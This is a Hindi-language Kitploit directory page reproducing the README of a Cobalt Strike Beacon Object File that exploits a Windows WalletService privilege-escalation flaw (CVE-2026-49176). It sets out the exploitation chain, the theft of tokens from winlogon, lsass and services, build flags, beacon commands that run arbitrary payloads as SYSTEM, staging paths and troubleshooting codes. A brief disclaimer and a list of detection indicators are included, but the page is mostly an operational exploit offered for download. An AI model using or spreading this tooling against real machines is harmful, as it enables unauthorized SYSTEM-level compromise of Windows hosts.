Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-49176_BOF — CVE-2026-49176 WalletService LPE — स्टैंडअलोन PoC + Cobalt Strike BOF (इंटरैक्टिव सत्र पर SYSTEM कमांड) | Kitploit
उपकरण/GitHubGitHub/777erp/cve-2026-49176_bof
विशेषाधिकार वृद्धिशोषणपोस्ट-शोषणरेड टीमिंगपेलोड डेवलपमेंट
GitHub777erp/cve-2026-49176_bof

CVE-2026-49176_BOF

CVE-2026-49176 WalletService LPE — स्टैंडअलोन PoC + Cobalt Strike BOF (इंटरैक्टिव सत्र पर SYSTEM कमांड)

रिपॉजिटरी देखें
4111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-49176 Cobalt Strike BOF

विंडोज WalletService (CVE-2026-49176, जुलाई 2026 में पैच किया गया) के माध्यम से स्थानीय विशेषाधिकार वृद्धि के लिए Cobalt Strike Beacon Object File (BOF)।

मध्यम-अखंडता (मानक उपयोगकर्ता) Beacon से, यह टूल एक दुर्भावनापूर्ण Wallet ESE डेटाबेस स्टेज करता है, Documents को रीडायरेक्ट करता है, WalletService को ट्रिगर करता है, और इंटरैक्टिव डेस्कटॉप पर NT AUTHORITY\SYSTEM के रूप में कॉलर-निर्दिष्ट कमांड लाइन चलाता है।

केवल-BOF ट्री।
मूल स्टैंडअलोन PowerShell PoC: DavidCarliez/CVE-2026-49176_LPE_POC। समान भेद्यता मूल कारण; भिन्न डिलीवरी और post-SYSTEM प्रक्रिया लॉन्च।


अस्वीकरण

केवल अधिकृत सुरक्षा अनुसंधान, शिक्षा और रक्षात्मक सत्यापन के लिए।


भेद्यता (मूल PoC के साथ साझा)

WalletService कॉलर का impersonation करते समय FOLDERID_Documents को रिज़ॉल्व करता है, फिर खोलने से पहले LocalSystem पर लौट जाता है:

root@kitploit:~
<Documents>\Wallet\wallet.db

एक मानक उपयोगकर्ता उस डेटाबेस को ESE user-defined default कॉलबैक (PATH\payload.dll!Export) के साथ सीड कर सकता है, Documents को एक नियंत्रित निर्देशिका पर इंगित कर सकता है, और WinRT WalletManager.RequestStoreAsync / GetItemsAsync कॉल कर सकता है ताकि सेवा DLL को SYSTEM के रूप में लोड करे।

विस्तृत लेख: CVE-2026-49176 Exploit Development: WalletService to SYSTEM


BOF बनाम मूल PoC — विशेषाधिकार-वृद्धि पथ

समान: SYSTEM कोड निष्पादन कैसे प्राप्त होता है

root@kitploit:~
Standard user
  → seed Wallet\wallet.db with ESE persisted callback (DLL!WalletCallback)
  → SHSetKnownFolderPath(FOLDERID_Documents) → staging root
  → trigger WalletService (WinRT RequestStore / GetItems)
  → service opens DB as LocalSystem → LoadLibrary(callback DLL)
  → attacker code runs as SYSTEM   ← LPE complete

भिन्न: कॉलबैक के बाद इंटरैक्टिव SYSTEM प्रक्रिया

WalletService अक्सर फ़िल्टर किया गया SYSTEM टोकन उपयोग करता है (कोई उपयोग योग्य SeAssignPrimaryToken / SeImpersonate नहीं)। सीधा CreateProcess* → 1314।

root@kitploit:~
Original PoC (post-SYSTEM):
  DLL → CreateService(shell_broker.exe) → broker → fixed cmd.exe

This BOF (post-SYSTEM):
  DLL → steal winlogon/services/lsass token → spawn <command>
     → else CreateService(cmd /c broker) → broker → spawn <command>

विशेषताएँ

  • सक्रिय डेस्कटॉप पर SYSTEM के रूप में किसी भी कमांड/फ़ाइल के लिए एकल Beacon कमांड
  • पूर्ण श्रृंखला इन-प्रोसेस: स्टेज → सीड → रीडायरेक्ट → ट्रिगर → प्रतीक्षा → Documents पुनर्स्थापित करें
  • bof_pack("bbZ") के माध्यम से wallet_callback.dll + shell_broker.exe पैक करता है
  • मल्टी-स्ट्रैटेजी post-SYSTEM स्पॉन + result.txt डायग्नोस्टिक्स
  • केवल x64

आवश्यकताएँ

आइटमआवश्यकता
Beacon

लेआउट

root@kitploit:~
bof/
├── README.md
├── entry.cpp                 # BOF orchestrator (go)
├── bofdefs.h / beacon.h
├── beacon-debug.h
├── cve2026_49176.cna
├── build.bat
├── payload/
│   ├── wallet_callback.c
│   └── shell_broker.c
├── bin/
│   ├── BOF/cve2026_49176.x64.o
│   └── payload/
│       ├── wallet_callback.dll
│       └── shell_broker.exe
└── resources/strip_bof.ps1

बिल्ड

root@kitploit:~
cd bof
build.bat
कमांडआउटपुट
build.bat / build.bat bothDLL + broker + x64 BOF
build.bat payloadकेवल DLL + broker
build.bat cleanआर्टिफैक्ट हटाएँ
root@kitploit:~
bin\payload\wallet_callback.dll
bin\payload\shell_broker.exe
bin\BOF\cve2026_49176.x64.o

यदि VS डिफ़ॉल्ट नहीं है तो build.bat में VCVARS64 पथ संपादित करें।
महत्वपूर्ण फ़्लैग: /DBOF /GS- /GR- /Gs999999 /GF- /Gy- /Gw- /Od (CS BOF लिंकर सुरक्षा)।


उपयोग

लोड करें

Cobalt Strike → Scripts → Load → cve2026_49176.cna
(हर रीबिल्ड के बाद पुनः लोड करें।)

कमांड

root@kitploit:~
beacon> cve2026_49176 C:\Windows\System32\cmd.exe
beacon> cve2026_49176 C:\Windows\Temp\payload.exe
beacon> cve2026_49176 C:\Windows\System32\cmd.exe /c whoami > C:\Users\Public\whoami.txt
  • यदि पथ में स्पेस नहीं हैं तो बाहरी कोट्स न लगाएँ।
  • वैकल्पिक मेनू: Beacon → CVE-2026-49176 → Run command as SYSTEM...

लक्ष्य पर स्टेजिंग

root@kitploit:~
%LOCALAPPDATA%\CVE-2026-49176-BOF\CVE49176_<tick>_<pid>\
├── Wallet\wallet.db
└── payload\
    ├── wallet_callback.dll
    ├── shell_broker.exe
    ├── command.txt          # UTF-16 LE
    └── result.txt

पैकिंग

root@kitploit:~
bof_pack(bid, "bbZ", wallet_callback.dll, shell_broker.exe, command)

अपेक्षित आउटपुट

टास्क लाइन

root@kitploit:~
[*] CVE-2026-49176 SYSTEM exec: C:\Windows\System32\cmd.exe [dll=... broker=... bof=...]

सफलता (उदाहरणात्मक)

root@kitploit:~
[*] CVE-2026-49176 BOF enter (args=...)
[*] parsed dll_len=... broker_len=... cmd_bytes=...
[*] stage payload...
[+] Seeded wallet.db, column=256
[*] Documents redirected to: ...
[+] WalletService triggered
[*] wait payload result (20s)...
[+] event=SYSTEM_PROCESS_STARTED ... user=SYSTEM detail=winlogon
[+] SYSTEM process launched
[*] Documents restored: ...
[+] CVE-2026-49176 BOF complete

detail= winlogon, services, lsass या broker पथ हो सकता है।

सामान्य विफलताएँ

जब रीडायरेक्ट सफल हुआ तो विफलता पर भी Documents पुनर्स्थापित हो जाता है।


आर्किटेक्चर

root@kitploit:~
cve2026_49176.cna
  └─ inline-execute(entry.o, go, bbZ)
        entry.cpp
          ├─ stage files under %LOCALAPPDATA%
          ├─ Jet*A seed wallet.db
          ├─ SHSetKnownFolderPath(Documents)
          ├─ WinRT WalletManager trigger
          └─ wait result.txt + restore Documents

wallet_callback.dll (WalletService, SYSTEM)
  ├─ steal winlogon / services / lsass token → spawn command
  └─ fallback: CreateService(cmd /c shell_broker)

shell_broker.exe
  └─ command.txt → CreateProcessAsUser (interactive session)

डिटेक्शन सतह

  • Documents ज्ञात-फ़ोल्डर परिवर्तन
  • %LOCALAPPDATA%\CVE-2026-49176-BOF\* + wallet.db + कॉलबैक DLL
  • WalletService द्वारा उपयोगकर्ता-लेखनीय DLL लोड करना
  • OpenProcess / टोकन APIs winlogon/lsass/services के विरुद्ध
  • अल्पकालिक सेवाएँ CVE49176_*
  • CreateProcessAsUserW / CreateProcessWithTokenW इंटरैक्टिव सत्रों में

सीमाएँ

  • केवल x64; अपैच्ड WalletService आवश्यक
  • कुछ बिल्ड पर Wallet WinRT API अनुपलब्ध/अप्रचलित हो सकता है
  • स्टेज निर्देशिका स्वतः हटाई नहीं जाती
  • ESE/WinRT Beacon के अंदर चलते हैं (प्रोसेस-पृथक मूल PoC की तुलना में क्रैश जोखिम)

संबंधित

लिंकविवरण
DavidCarliez/CVE-2026-49176_LPE_POCमूल स्टैंडअलोन LPE PoC (अपस्ट्रीम अनुसंधान PoC)
विस्तृत लेखमूल अनुसंधान लेख
टूल डाउनलोड करें
चरणमूल PoCयह BOF
ESE DB सीड करेंwallet_ese_seed.exeIn-BOF Jet*A
Documents रीडायरेक्ट करेंdocuments_path.exeIn-BOF SHGet/SetKnownFolderPath
Wallet ट्रिगर करेंPowerShell WinRTIn-BOF RoGetActivationFactory
कॉलबैक DLLwallet_callback_shell.dllwallet_callback.dll
मूल PoCयह BOF
लक्ष्य प्रक्रियाहार्ड-कोडेड cmd.exeऑपरेटर-आपूर्ति कमांड लाइन
प्राथमिक विधिअस्थायी सेवा → shell_broker.exe → CreateProcessAsUserWwinlogon / services / lsass से टोकन चोरी → स्पॉन
फ़ॉलबैककोई नहींSCM + cmd.exe /c "shell_broker.exe" "result.txt"
x64, मध्यम अखंडता (non-elevated)
लक्ष्यभेद्य WalletService (जुलाई 2026 पैच से पहले)
CSBOF समर्थन के साथ Cobalt Strike 4.x
बिल्डVS 2019/2022 C++ + Windows 10 SDK (esent.h, WinRT)
लॉगअर्थ
JetAddColumn: -1003ESE पैरामीटर समस्या
error=1314फ़िल्टर किया गया SYSTEM; token steal / broker आवश्यक
STEAL_FAIL error=5लक्ष्य प्रक्रिया/टोकन खोल नहीं सकते
StartService error=32शेयरिंग उल्लंघन (cmd रैपर के माध्यम से कम किया गया)
detail=all_methodsसभी post-SYSTEM रणनीतियाँ विफल
लिंकर Unknown symbol '??_C@_...'खराब BOF बिल्ड फ़्लैग; build.bat के साथ पुनः बिल्ड करें